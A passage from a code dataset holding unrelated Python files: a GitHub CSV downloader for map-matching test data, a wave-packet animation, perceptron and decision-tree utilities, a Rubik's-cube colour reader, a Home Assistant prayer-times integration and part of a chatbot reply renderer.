mydict[rowIndex+1]","sub_path":"LeetCode_exercises/ex0119_pascalsTriangleII.py","file_name":"ex0119_pascalsTriangleII.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"498399794","text":"# @author Kai (Frank) Zhang (zhangk2019@seu.edu.cn)\r\n# @time 2021/5/20 9:40\r\n# @desc [script description]\r\n\r\n\r\n#!/usr/bin/python\r\n# coding:utf-8\r\n\r\nimport requests\r\nimport io\r\nimport pandas as pd\r\nimport csv\r\nimport os\r\nimport threading\r\nimport shutil\r\n\r\n\r\ndef _download_url(url, filename, loc_dir):\r\n try:\r\n import requests\r\n except ImportError:\r\n print('please print requests to preceed downloading!!')\r\n\r\n try:\r\n r = requests.get(url)\r\n r.raise_for_status()\r\n with open(loc_dir+filename, 'wb') as f:\r\n f.write(r.content)\r\n except requests.HTTPError:\r\n print('file not existing: '+url)\r\n except requests.ConnectionError:\r\n raise Exception(\r\n 'check your connectcion!!! Then, if the input data exists, copy the data from local system')\r\n if(os.path.exists(\"./testdata\")):\r\n filePath = os.path.join('./testdata/')\r\n currentPath = os.path.join('./')\r\n shutil.copy(filePath+'node.csv', currentPath)\r\n shutil.copy(filePath+'link.csv', currentPath)\r\n shutil.copy(filePath+'trace.csv', currentPath)\r\n except Exception as e:\r\n raise e\r\n\r\n\r\ndef first_way():\r\n # raw.githubusercontent.com/username/repo-name/branch-name/path\r\n url = 'https://raw.githubusercontent.com/xiaomo123zk/MapMatching4GMNS-0.2.14/master/MapMatching4GMNS/'\r\n\r\n data_sets = [\r\n \"testdata\"\r\n ]\r\n\r\n files = [\r\n \"node.csv\",\r\n \"link.csv\",\r\n \"trace.csv\"\r\n ]\r\n\r\n print('downloading starts')\r\n\r\n # data folder under cdw\r\n loc_data_dir = 'data'\r\n if not os.path.isdir(loc_data_dir):\r\n os.mkdir(loc_data_dir)\r\n\r\n for ds in data_sets:\r\n web_dir = url + ds + '/'\r\n loc_sub_dir = os.path.join(loc_data_dir, ds) + '/'\r\n\r\n if not os.path.isdir(loc_sub_dir):\r\n os.mkdir(loc_sub_dir)\r\n\r\n # multi-threading\r\n threads = []\r\n for x in files:\r\n t = threading.Thread(\r\n target=_download_url,\r\n args=(web_dir+x, x, loc_sub_dir)\r\n )\r\n t.start()\r\n threads.append(t)\r\n\r\n for t in threads:\r\n t.join()\r\n\r\n print('downloading completes')\r\n\r\n print('check '+os.path.join(os.getcwd(), loc_data_dir) +\r\n ' for downloaded data sets')\r\n\r\n # then, copy the input data to current path\r\n if(os.path.exists(\"./data/testdata/\")):\r\n filePath = os.path.join(\"./data/testdata/\")\r\n currentPath = os.path.join(os.getcwd())\r\n shutil.copy(filePath+'/node.csv', currentPath)\r\n shutil.copy(filePath+'/link.csv', currentPath)\r\n shutil.copy(filePath+'/trace.csv', currentPath)\r\n\r\n\r\ndef second_way():\r\n node_url = 'https://raw.githubusercontent.com/asu-trans-ai-lab/MapMatching4GMNS/blob/master/release/node.csv'\r\n s = requests.get(node_url).content\r\n pd_url = pd.read_csv(io.StringIO(s.decode('utf-8')))\r\n pd_url.head()\r\n pd_url.to_csv(\"node.csv\", index=True, encoding='utf-8')\r\n\r\n link_url = 'https://raw.githubusercontent.com/asu-trans-ai-lab/MapMatching4GMNS/blob/master/release/link.csv'\r\n s = requests.get(link_url).content\r\n pd_url = pd.read_csv(io.StringIO(s.decode('utf-8')))\r\n pd_url.head()\r\n pd_url.to_csv(\"link.csv\", index=True, encoding='utf-8')\r\n\r\n trace_url = 'https://raw.githubusercontent.com/asu-trans-ai-lab/MapMatching4GMNS/master/release/trace.csv'\r\n s = requests.get(trace_url).content\r\n 
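Note on the Pascal's-triangle record above: its docstring asks for O(k) extra space, but both solutions keep whole earlier rows (the recursion holds one per frame; the memoized variant stores every row). The standard O(k) answer updates a single row right-to-left so each pass reads the previous row's values before overwriting them:

```python
# Standalone sketch of the O(k)-space variant the docstring above asks for.
def get_row(row_index):
    row = [1] * (row_index + 1)
    for n in range(2, row_index + 1):
        for i in range(n - 1, 0, -1):    # right-to-left keeps row[i-1] intact
            row[i] += row[i - 1]
    return row

assert get_row(0) == [1]
assert get_row(4) == [1, 4, 6, 4, 1]
```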
pd_url = pd.read_csv(io.StringIO(s.decode('utf-8')))\r\n pd_url.head()\r\n pd_url.to_csv(\"trace.csv\", index=True, encoding='utf-8')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # 1, download the sample data set from GitHub,\r\n # note: if the user does not download data from the Web successfully,\r\n # please manually copy the data to the current path from \"https://github.com/xiaomo123zk/MapMatching4GMNS-0.2.14/tree/main/MapMatching4GMNS/\"\r\n\r\n first_way()\r\n\r\n # second_way()\r\n","sub_path":"tool/down_input_data_from_Github.py","file_name":"down_input_data_from_Github.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253219201","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nprint(np.exp((-1*2**2)))\nc=1\ndef wave_real(x,t,omega,k):\n return np.exp(-(x-t)**2)*np.cos(k*x-omega*t)\n\ndef wave_imaginary(x,t,omega,k):\n return np.exp(-(x-t)**2)*np.sin(k*x-omega*t)\n\n\nxx=np.arange(0,10,.01)\nk0=10\nk1=8\nomega0=40\nomega1=20\nfor t in np.arange(0,10,.02):\n plt.title('$t=$'+str(t))\n plt.subplot(311)\n aa=plt.plot(xx,wave_real(xx,t,omega0,k0))\n plt.ylabel('$\\\\psi$',fontsize=15)\n plt.subplot(312)\n aa=plt.plot(xx,wave_imaginary(xx,t,omega0,k0))\n plt.ylabel('$\\\\psi_*$',fontsize=15)\n plt.subplot(313)\n aa=plt.plot(xx,wave_real(xx,t,omega0,k0)**2+wave_imaginary(xx,t,omega0,k0)**2)\n# aa=plt.plot(xx,2*wave(xx,t,(omega0-omega1)/2.,(k0-k1)/2.),'r')\n# aa=plt.plot(xx,-2*wave(xx,t,(omega0-omega1)/2.,(k0-k1)/2.),'r')\n plt.ylabel('$|\\\\psi|^2$',fontsize=15)\n plt.xlabel('x')\n plt.pause(.0000001)\n\n plt.clf()\n","sub_path":"Gaussian_wave_travelling_right.py","file_name":"Gaussian_wave_travelling_right.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21679899","text":"from __future__ import division\nfrom operator import itemgetter\nimport numpy\nimport math\ndot = numpy.dot\n\n\ndef evaluate_perceptron(testing_examples, weight_vector):\n incorrect = 0\n total = 0\n act_pos = 0\n true_pos = 0\n pred_pos = 0\n for example, label in testing_examples:\n ret = dot(weight_vector, example)\n sign = -1 if ret < 0 else 1\n if sign == 1 and label == 1:\n true_pos += 1\n if sign == 1:\n pred_pos += 1\n if label == 1:\n act_pos += 1\n if sign != label:\n incorrect += 1\n\n total += 1\n if pred_pos == 0:\n p = 0\n else:\n p = true_pos / pred_pos\n if act_pos == 0:\n r = 0\n else:\n r = true_pos / act_pos\n if p == 0 and r == 0:\n fscore = 0\n else:\n fscore = 2 * p * r / (p + r)\n # print(\"f1 score: \" + str(fscore))\n # print(incorrect)\n return ((total - incorrect) / total), p, r, fscore\n\n\ndef get_feats_array(filename):\n arr = []\n with open(filename) as f:\n for l in f:\n if 'madelon' in filename:\n arr.append([1] + [int(float(x.strip())) for x in l.split(',')])\n else:\n arr.append([1] + [int(float(x.strip())) for x in l.split()])\n\n return arr\n\n\ndef get_labels_array(filename):\n arr = []\n with open(filename) as f:\n for l in f:\n arr.append(int(l.strip()))\n\n return arr\n\n\ndef build_tree_file(feats, labels, name):\n outstring = ''\n feat_lines = []\n labels_lines = []\n with open(feats) as feat:\n for l in feat:\n feat_lines.append(l.strip())\n\n with open(labels) as label:\n for l in label:\n labels_lines.append(l)\n\n with open(name, 'w') as out_file:\n for i in range(len(feat_lines)):\n out_file.write(feat_lines[i] + ',' + labels_lines[i])\n\n\ndef 
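Note on `evaluate_perceptron` above: predictions come from the sign of `dot(w, x)` against labels in {−1, 1}, and precision, recall, and F1 are each guarded against division by zero. A compact standalone version of that metric logic:

```python
# Standalone sketch of the metric bookkeeping in evaluate_perceptron above,
# with the same zero-division guards.
def f1_stats(preds, labels):
    tp = sum(1 for p, y in zip(preds, labels) if p == 1 and y == 1)
    pred_pos = sum(1 for p in preds if p == 1)
    act_pos = sum(1 for y in labels if y == 1)
    precision = tp / pred_pos if pred_pos else 0
    recall = tp / act_pos if act_pos else 0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0
    return precision, recall, f1

p, r, f1 = f1_stats([1, 1, -1, -1], [1, -1, 1, -1])
assert (p, r) == (0.5, 0.5) and abs(f1 - 0.5) < 1e-9
```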
get_avg_threshold(example_arr):\n thresh_arr = [0] * len(example_arr[0])\n for i in range(len(example_arr)):\n for index in range(len(example_arr[i])):\n thresh_arr[index] += example_arr[i][index]\n\n return [x/len(example_arr) for x in thresh_arr]\n\n\ndef get_ig_threshold(example_arr):\n threshold_arr = [0] * (len(example_arr[0]) - 1)\n for col in range(len(example_arr[0]) - 1):\n sorted_arr = sorted(example_arr, key=itemgetter(col))\n threshold_arr[col] = get_ig_split(sorted_arr, col)\n\n return threshold_arr\n\n\ndef get_ig_split(arr, col):\n best_split = 0\n best_split_index = 0\n for row in range(len(arr)):\n split = evaluate_split(arr, row)\n if split > best_split:\n best_split = split\n best_split_index = row\n\n return arr[best_split_index][col]\n\n\ndef evaluate_split(arr, row):\n e_total = entropy(arr)\n low_split = arr[:row]\n high_split = arr[row:]\n rhs_sum = len(low_split)/len(arr) * entropy(low_split) + len(high_split)/len(arr) * entropy(high_split)\n return e_total - rhs_sum\n\n\ndef entropy(arr):\n if len(arr) == 0:\n return 0\n pos_count = 0\n for i in arr:\n if i[-1] == 1:\n pos_count += 1\n\n pos_count /= len(arr)\n neg_count = 1 - pos_count\n if pos_count == 0 and neg_count == 0:\n return 0\n if pos_count == 0:\n return -1 * neg_count * math.log2(neg_count)\n if neg_count == 0:\n return pos_count * (-1) * math.log2(pos_count)\n return pos_count * (-1) * math.log2(pos_count) - neg_count * math.log2(neg_count)\n\n\ndef process_arr(thresh_arr, example_arr):\n for i in range(len(example_arr)):\n for index in range(len(example_arr[i])):\n example_arr[i][index] = 1 if example_arr[i][index] >= thresh_arr[index] else 0\n\n return example_arr\n\n\ndef get_old_feats_arr(in_f, max_feats=124):\n arr = []\n labels = []\n f = open(in_f)\n for l in f:\n c_arr = [0] * max_feats\n c_arr[0] = 1\n ls = l.split()\n for i in range(1, len(ls)):\n item = ls[i].split(':')\n c_arr[int(item[0])] = int(item[1])\n labels.append(int(ls[0]))\n arr.append(c_arr)\n\n return arr, labels\n\n\n\n\n# build_tree_file('./data/madelon/madelon_train_processed.data', './data/madelon/madelon_train.labels', './data/madelon/tree_madelon_train_processed.data')\n# build_tree_file('./data/madelon/madelon_test_processed.data', './data/madelon/madelon_test.labels', './data/madelon/tree_madelon_test_processed.data')\n# build_tree_file('./data/handwriting/train.data', './data/handwriting/train.labels', './data/handwriting/tree_train.data')\n# build_tree_file('./data/handwriting/test.data', './data/handwriting/test.labels', './data/handwriting/tree_test.data')\n","sub_path":"cs5350/a06/svm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"271071414","text":"import cv2\nimport colorsys\nimport solver\nimport serial\nimport cv2\n\n# cap = cv2.VideoCapture(0)\ngreen = [80,255,255] \nblue = [160,50,50] \nyellow = [45,255,255] \nwhite = [0,5,5] \norange = [19,100,100] \nred = [167,255,255]\nblack= [0,0,0]\n\ngreen_bgr = [0,255,0]\nblue_bgr = [255,0,0]\nred_bgr = [0,0,255]\nyellow_bgr = [0,255,255]\norange_bgr = [0,128,255]\nwhite_bgr = [255,255,255]\n\n\n\n# This function fixes the color of the pixel into the standard color\ndef colorFix(color): \n # The color of the pixel at first is in BGR \n # Now we have to convert it into HSV\n color = colorsys.rgb_to_hsv(color[2]/255, color[1]/255, color[0]/255)\n color = (color[0]*255,color[1]*255,color[2]*255)\n # print(color)\n color = list(color)\n # 
Depend on the color code in HSV, we classify them into 6 different color\n if(color[2]>=150) and color[1]<80 :\n # print('White')\n return white_bgr\n elif (color>[yellow[0]-15,50,50]) and color < [yellow[0]+20,255,255]:\n # print('Yellow')\n return yellow_bgr\n elif (color>[orange[0]-7,50,50]) and color < [orange[0]+10,255,255]:\n # print('Orange')\n return orange_bgr\n elif ((color<[12,255,255]) and color > [0,50,50]) or (color>[200,100,100]) and color < [255,255,255]:\n # print('Red')\n return red_bgr\n elif (color>[green[0]-20,50,50]) and color < [green[0]+40,255,255]:\n # print('Green')\n return green_bgr\n elif (color>[blue[0]-15,50,50]) and color < [blue[0]+15,255,255]:\n # print('Blue')\n return blue_bgr\n \n else:\n return black\ndef read(frame):\n#Initialize the coordinates of the scanning pixel\n c = [[]]\n X = 240\n Y = 100\n originX = (X,Y)\n originY = (X+50,Y+50)\n X1 =((originX[0]+originY[0])/2)\n Y1 = ((originX[1]+originY[1])/2)\n origin = (int (X1),int (Y1))\n\n #Take the center pixel of each square\n \n cl1 = frame[int (Y1),int (X1)]\n cl12 = frame[int (Y1)-20,int (X1)]\n cl13 = frame[int (Y1)+20,int (X1)] \n cl11=cl1\n cl1[0] = (cl11[0]/3+cl12[0]/3+cl13[0]/3)\n c1 = cl1.tolist() #Convert the tuple into a list\n c1 = colorFix(c1) #Turn the color of the pixel \n \n \n cl2 = frame[int (Y1)+100,int (X1)]\n cl22 = frame[int (Y1)+100-20,int (X1)]\n cl23 = frame[int (Y1)+100+20,int (X1)] \n cl21=cl2\n cl2[0] = (cl21[0]/3+cl22[0]/3+cl23[0]/3)\n c2 = cl2.tolist()\n c2 = colorFix(c2)\n \n cl3 = frame[int (Y1)+200,int (X1)]\n cl32 = frame[int (Y1)+200-20,int (X1)]\n cl33 = frame[int (Y1)+200+20,int (X1)] \n cl31=cl3\n cl3[0] = (cl31[0]/3+cl32[0]/3+cl33[0]/3)\n c3 = cl3.tolist()\n c3 = colorFix(c3)\n \n cl4= frame[int (Y1),int (X1) +100]\n cl42 = frame[int (Y1)-20,int (X1)+100] \n cl43 = frame[int (Y1)+20,int (X1)+100] \n cl41=cl4\n cl4[0] = (cl41[0]/3+cl42[0]/3+cl43[0]/3)\n c4 = cl4.tolist()\n c4 = colorFix(c4)\n \n cl5 = frame[int (Y1)+100,int (X1)+100]\n cl52 = frame[int (Y1)+100-20,int (X1)+100]\n cl53 = frame[int (Y1)+100+20,int (X1)+100] \n cl51=cl5\n cl5[0] = (cl51[0]/3+cl52[0]/3+cl53[0]/3)\n c5 = cl5.tolist()\n c5 = colorFix(c5)\n \n cl6 = frame[int (Y1)+200,int (X1)+100]\n cl62 = frame[int (Y1)+200-20,int (X1)+100]\n cl63 = frame[int (Y1)+200+20,int (X1)+100] \n cl61=cl6\n cl6[0] = (cl61[0]/3+cl62[0]/3+cl63[0]/3)\n c6 = cl6.tolist()\n c6 = colorFix(c6)\n \n cl7 = frame[int (Y1),int (X1)+200]\n cl72 = frame[int (Y1)-20,int (X1)+200]\n cl73 = frame[int (Y1)+20,int (X1)+200] \n cl71=cl7\n cl7[0] = (cl71[0]/3+cl72[0]/3+cl73[0]/3)\n c7 = cl7.tolist()\n c7 = colorFix(c7)\n \n cl8 = frame[int (Y1)+100,int (X1)+200]\n cl82 = frame[int (Y1)+100-20,int (X1)+200]\n cl83 = frame[int (Y1)+100+20,int (X1)+200] \n cl81=cl8\n cl8[0] = (cl81[0]/3+cl82[0]/3+cl83[0]/3)\n c8 = cl8.tolist()\n c8 = colorFix(c8)\n \n cl9 = frame[int (Y1)+200,int (X1)+200]\n cl92 = frame[int (Y1)+200-20,int (X1)+200]\n cl93 = frame[int (Y1)+200+20,int (X1)+200] \n cl91=cl9\n cl9[0] = (cl91[0]/3+cl92[0]/3+cl93[0]/3)\n c9 = cl9.tolist()\n c9 = colorFix(c9)\n \n #Draw the square and the point\n # Square 1\n cv2.rectangle(frame, originX, originY, color = c1, thickness=15, lineType=8, shift=0)\n cv2.circle(frame, origin, radius = 10, color = c1, thickness=15, lineType=8, shift=0) \n # Square 2\n cv2.rectangle(frame, (originX[0]+100,originX[1]), (originY[0]+100,originY[1]), color = c4, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+100,origin[1]), radius = 10, color = c4, thickness=15, lineType=8, 
shift=0)\n # Square 3\n cv2.rectangle(frame, (originX[0]+200,originX[1]), (originY[0]+200,originY[1]), color = c7, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+200,origin[1]), radius = 10, color = c7, thickness=15, lineType=8, shift=0)\n # Square 4\n cv2.rectangle(frame, (originX[0],originX[1]+100), (originY[0],originY[1]+100), color = c2, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0],origin[1]+100), radius = 10, color = c2, thickness=15, lineType=8, shift=0)\n # Square 5\n cv2.rectangle(frame, (originX[0]+100,originX[1]+100), (originY[0]+100,originY[1]+100), color = c5, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+100,origin[1]+100), radius = 10, color = c5, thickness=15, lineType=8, shift=0)\n # Square 6\n cv2.rectangle(frame, (originX[0]+200,originX[1]+100), (originY[0]+200,originY[1]+100), color = c8, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+200,origin[1]+100), radius = 10, color = c8, thickness=15, lineType=8, shift=0)\n # Square 7\n cv2.rectangle(frame, (originX[0],originX[1]+200), (originY[0],originY[1]+200), color = c3, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0],origin[1]+200), radius = 10, color = c3, thickness=15, lineType=8, shift=0)\n # Square 8\n cv2.rectangle(frame, (originX[0]+100,originX[1]+200), (originY[0]+100,originY[1]+200), color = c6, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+100,origin[1]+200), radius = 10, color = c6, thickness=15, lineType=8, shift=0)\n # Square 9\n cv2.rectangle(frame, (originX[0]+200,originX[1]+200), (originY[0]+200,originY[1]+200), color = c9, thickness=15, lineType=8, shift=0) \n cv2.circle(frame, (origin[0]+200,origin[1]+200), radius = 10, color = c9, thickness=15, lineType=8, shift=0)\n \n # Show the frame to scan\n # cv2.imshow('Frame',frame)\n s=''\n s+=check(c1)\n s+=check(c4)\n s+=check(c7)\n s+=check(c2)\n s+=check(c5)\n s+=check(c8)\n s+=check(c3)\n s+=check(c6)\n s+=check(c9) \n return s,frame\ndef check(c):\n if c == green_bgr:\n return 'G'\n if c == blue_bgr:\n return 'H'\n if c == red_bgr:\n return 'J'\n if c == orange_bgr:\n return 'O'\n if c == yellow_bgr:\n return 'Y'\n if c == white_bgr:\n return 'W'\n else:\n return'M'\n# def process():\n# while True:\n# #Turn the capture into a frame\n# s='M'*54\n# _, frame = cap.read()\n# c = read(frame)\n# k = cv2.waitKey(5) & 0xFF \n# n=0\n# k=0\n# if k == 0:\n# count = 0\n# print('Enter input mode')\n# while(count<6):\n# _, frame = cap.read()\n# c = read(frame)\n# key = cv2.waitKey(5) & 0xFF\n# print(count)\n# if key == ord(\" \"):\n# s2=''\n# s2 = s2+c\n# if s2[4]=='H':\n# s=s2[0:9] + s[9:54] \n# count+=1\n \n# elif s2[4]=='J': \n# s=s[0:9] + s2[0:9] + s[18:54]\n# count+=1\n \n# elif s2[4]=='G':\n# s=s[0:18] + s2[0:9] + s[27:54]\n# count+=1\n \n# elif s2[4]=='O':\n# s=s[0:27] + s2[0:9] + s[36:54]\n# count+=1\n \n# elif s2[4]=='Y':\n# s=s[0:36] + s2[0:9] + s[45:54]\n# count+=1\n \n# elif s2[4]=='W':\n# s=s[0:45] + s2[0:9]\n# count+=1 \n# # print(s2) \n# # print(s)\n# k=27 \n# if k == 27:\n# break \n\n# t = s\n# print(t)\n# cv2.destroyAllWindows()\n# cap.release()\n# return t","sub_path":"cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":8732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28463217","text":"\"\"\"The islamic_prayer_times component.\"\"\"\nfrom datetime import timedelta\nimport logging\n\nfrom prayer_times_calculator import PrayerTimesCalculator, exceptions\nfrom 
requests.exceptions import ConnectionError as ConnError\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import Platform\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.exceptions import ConfigEntryNotReady\nfrom homeassistant.helpers import config_validation as cv\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.event import async_call_later, async_track_point_in_time\nimport homeassistant.util.dt as dt_util\n\nfrom .const import CONF_CALC_METHOD, DATA_UPDATED, DEFAULT_CALC_METHOD, DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\nPLATFORMS = [Platform.SENSOR]\n\nCONFIG_SCHEMA = cv.removed(DOMAIN, raise_if_present=False)\n\n\nasync def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:\n \"\"\"Set up the Islamic Prayer Component.\"\"\"\n client = IslamicPrayerClient(hass, config_entry)\n hass.data[DOMAIN] = client\n await client.async_setup()\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:\n \"\"\"Unload Islamic Prayer entry from config_entry.\"\"\"\n if hass.data[DOMAIN].event_unsub:\n hass.data[DOMAIN].event_unsub()\n hass.data.pop(DOMAIN)\n return await hass.config_entries.async_unload_platforms(config_entry, PLATFORMS)\n\n\nclass IslamicPrayerClient:\n \"\"\"Islamic Prayer Client Object.\"\"\"\n\n def __init__(self, hass, config_entry):\n \"\"\"Initialize the Islamic Prayer client.\"\"\"\n self.hass = hass\n self.config_entry = config_entry\n self.prayer_times_info = {}\n self.available = True\n self.event_unsub = None\n\n @property\n def calc_method(self):\n \"\"\"Return the calculation method.\"\"\"\n return self.config_entry.options[CONF_CALC_METHOD]\n\n def get_new_prayer_times(self):\n \"\"\"Fetch prayer times for today.\"\"\"\n calc = PrayerTimesCalculator(\n latitude=self.hass.config.latitude,\n longitude=self.hass.config.longitude,\n calculation_method=self.calc_method,\n date=str(dt_util.now().date()),\n )\n return calc.fetch_prayer_times()\n\n async def async_schedule_future_update(self):\n \"\"\"Schedule future update for sensors.\n\n Midnight is a calculated time. The specifics of the calculation\n depends on the method of the prayer time calculation. This calculated\n midnight is the time at which the time to pray the Isha prayers have\n expired.\n\n Calculated Midnight: The Islamic midnight.\n Traditional Midnight: 12:00AM\n\n Update logic for prayer times:\n\n If the Calculated Midnight is before the traditional midnight then wait\n until the traditional midnight to run the update. This way the day\n will have changed over and we don't need to do any fancy calculations.\n\n If the Calculated Midnight is after the traditional midnight, then wait\n until after the calculated Midnight. 
We don't want to update the prayer\n times too early or else the timings might be incorrect.\n\n Example:\n calculated midnight = 11:23PM (before traditional midnight)\n Update time: 12:00AM\n\n calculated midnight = 1:35AM (after traditional midnight)\n update time: 1:36AM.\n\n \"\"\"\n _LOGGER.debug(\"Scheduling next update for Islamic prayer times\")\n\n now = dt_util.utcnow()\n\n midnight_dt = self.prayer_times_info[\"Midnight\"]\n\n if now > dt_util.as_utc(midnight_dt):\n next_update_at = midnight_dt + timedelta(days=1, minutes=1)\n _LOGGER.debug(\n \"Midnight is after day the changes so schedule update for after\"\n \" Midnight the next day\"\n )\n else:\n _LOGGER.debug(\n \"Midnight is before the day changes so schedule update for the next\"\n \" start of day\"\n )\n next_update_at = dt_util.start_of_local_day(now + timedelta(days=1))\n\n _LOGGER.info(\"Next update scheduled for: %s\", next_update_at)\n\n self.event_unsub = async_track_point_in_time(\n self.hass, self.async_update, next_update_at\n )\n\n async def async_update(self, *_):\n \"\"\"Update sensors with new prayer times.\"\"\"\n try:\n prayer_times = await self.hass.async_add_executor_job(\n self.get_new_prayer_times\n )\n self.available = True\n except (exceptions.InvalidResponseError, ConnError):\n self.available = False\n _LOGGER.debug(\"Error retrieving prayer times\")\n async_call_later(self.hass, 60, self.async_update)\n return\n\n for prayer, time in prayer_times.items():\n self.prayer_times_info[prayer] = dt_util.parse_datetime(\n f\"{dt_util.now().date()} {time}\"\n )\n await self.async_schedule_future_update()\n\n _LOGGER.debug(\"New prayer times retrieved. Updating sensors\")\n async_dispatcher_send(self.hass, DATA_UPDATED)\n\n async def async_setup(self):\n \"\"\"Set up the Islamic prayer client.\"\"\"\n await self.async_add_options()\n\n try:\n await self.hass.async_add_executor_job(self.get_new_prayer_times)\n except (exceptions.InvalidResponseError, ConnError) as err:\n raise ConfigEntryNotReady from err\n\n await self.async_update()\n self.config_entry.add_update_listener(self.async_options_updated)\n\n await self.hass.config_entries.async_forward_entry_setups(\n self.config_entry, PLATFORMS\n )\n\n return True\n\n async def async_add_options(self):\n \"\"\"Add options for entry.\"\"\"\n if not self.config_entry.options:\n data = dict(self.config_entry.data)\n calc_method = data.pop(CONF_CALC_METHOD, DEFAULT_CALC_METHOD)\n\n self.hass.config_entries.async_update_entry(\n self.config_entry, data=data, options={CONF_CALC_METHOD: calc_method}\n )\n\n @staticmethod\n async def async_options_updated(hass: HomeAssistant, entry: ConfigEntry) -> None:\n \"\"\"Triggered by config entry options updates.\"\"\"\n if hass.data[DOMAIN].event_unsub:\n hass.data[DOMAIN].event_unsub()\n await hass.data[DOMAIN].async_update()\n","sub_path":"homeassistant/components/islamic_prayer_times/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"326550033","text":"\"\"\" A neural chatbot using sequence to sequence model with\nattentional decoder.\n\nThis is based on Google Translate Tensorflow model\nhttps://github.com/tensorflow/models/blob/master/tutorials/rnn/translate/\n\nSequence to sequence model by Cho et al.(2014)\n\nCreated by Chip Huyen as the starter code for assignment 3,\nclass CS 20SI: \"TensorFlow for Deep Learning Research\"\ncs20si.stanford.edu\n\nThis file contains the code to run 
the model.\n\nSee readme.md for instruction on how to run the starter code.\n\nThis implementation learns NUMBER SORTING via seq2seq. Number range: 0,1,2,3,4,5,EOS\n\nhttps://papers.nips.cc/paper/5346-sequence-to-sequence-learning-with-neural-networks.pdf\n\nSee README.md to learn what this code has done!\n\nAlso SEE https://stackoverflow.com/questions/38241410/tensorflow-remember-lstm-state-for-next-batch-stateful-lstm\nfor special treatment for this code\n\nRender. render api_call_request_price to 什么价格...\n\"\"\"\nimport os\nimport sys\nimport logging\nimport traceback\nimport time\n\nimport numpy as np\n\nparentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ngrandfatherdir = os.path.dirname(os.path.dirname(\n os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(parentdir)\nsys.path.append(grandfatherdir)\n\nimport utils.solr_util as solr_util\nfrom qa.qa import Qa as QA\ncurrent_date = time.strftime(\"%Y.%m.%d\")\nlogging.basicConfig(handlers=[logging.FileHandler(os.path.join(grandfatherdir,\n 'logs/log_corpus_' + current_date + '.log'), 'w', 'utf-8')],\n format='%(asctime)s %(message)s', datefmt='%Y.%m.%dT%H:%M:%S', level=logging.INFO)\n\nclass Render:\n\n prefix = ['这样啊..', 'OK..', '好吧']\n\n def __init__(self, config):\n self.index_cls_name_mapper = dict()\n self._load_major_render(config['renderer_file'])\n # self.belief_tracker = belief_tracker\n self.interactive = QA('interactive')\n self.faq = QA('faq')\n print('attaching rendering file...')\n\n def _load_major_render(self, file):\n self.major_render_mapper = dict()\n with open(file, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip('\\n')\n key, replies = line.split('|')\n key = key.split('##')[0]\n replies = replies.split('/')\n filtered = []\n for r in replies:\n if r:\n filtered.append(r)\n self.major_render_mapper[key] = filtered\n\n def render_mapper(self, mapper):\n mapper_render = []\n if 'brand' in mapper:\n mapper_render.append(mapper['brand'])\n if 'category' in mapper:\n mapper_render.append(mapper['category'])\n return ''.join(mapper_render)\n\n def random_prefix(self):\n return np.random.choice(self.prefix)\n\n def render_api(self, api):\n if api not in self.major_render_mapper:\n return api\n return np.random.choice(self.major_render_mapper[api])\n\n def render(self, q, response, avails=dict(), prefix=''):\n try:\n if response.startswith('api_call_base') or response.startswith('api_call_greet')\\\n or response.startswith('reserved_'):\n # self.sess.clear_memory()\n matched, answer, score = self.interactive.get_responses(\n query=q)\n return answer\n if response.startswith('api_call_faq') or response.startswith('api_call_query_discount'):\n matched, answer, score = self.faq.get_responses(\n query=q)\n return answer\n if response.startswith('api_call_slot_virtual_category') or response == 'api_greeting_search_normal':\n return np.random.choice(['您要买什么?我们有手机,冰箱,电视,电脑和空调.', '你可以看看我们的手机,冰箱,电视空调电脑'])\n if response.startswith('api_call_request_'):\n if response.startswith('api_call_request_ambiguity_removal_'):\n # params = response.replace(\n # 'api_call_request_ambiguity_removal_', '')\n # rendered = '你要哪一个呢,' + params\n # return rendered + \"@@\" + response\n return self.render_api(response)\n # params = response.replace('api_call_request_', '')\n # params = self.belief_tracker.belief_graph.slots_trans[params]\n # rendered = '什么' + params\n # return rendered + \"@@\" + response\n if prefix:\n return prefix + self.render_api(response)\n return self.render_api(response)\n if 
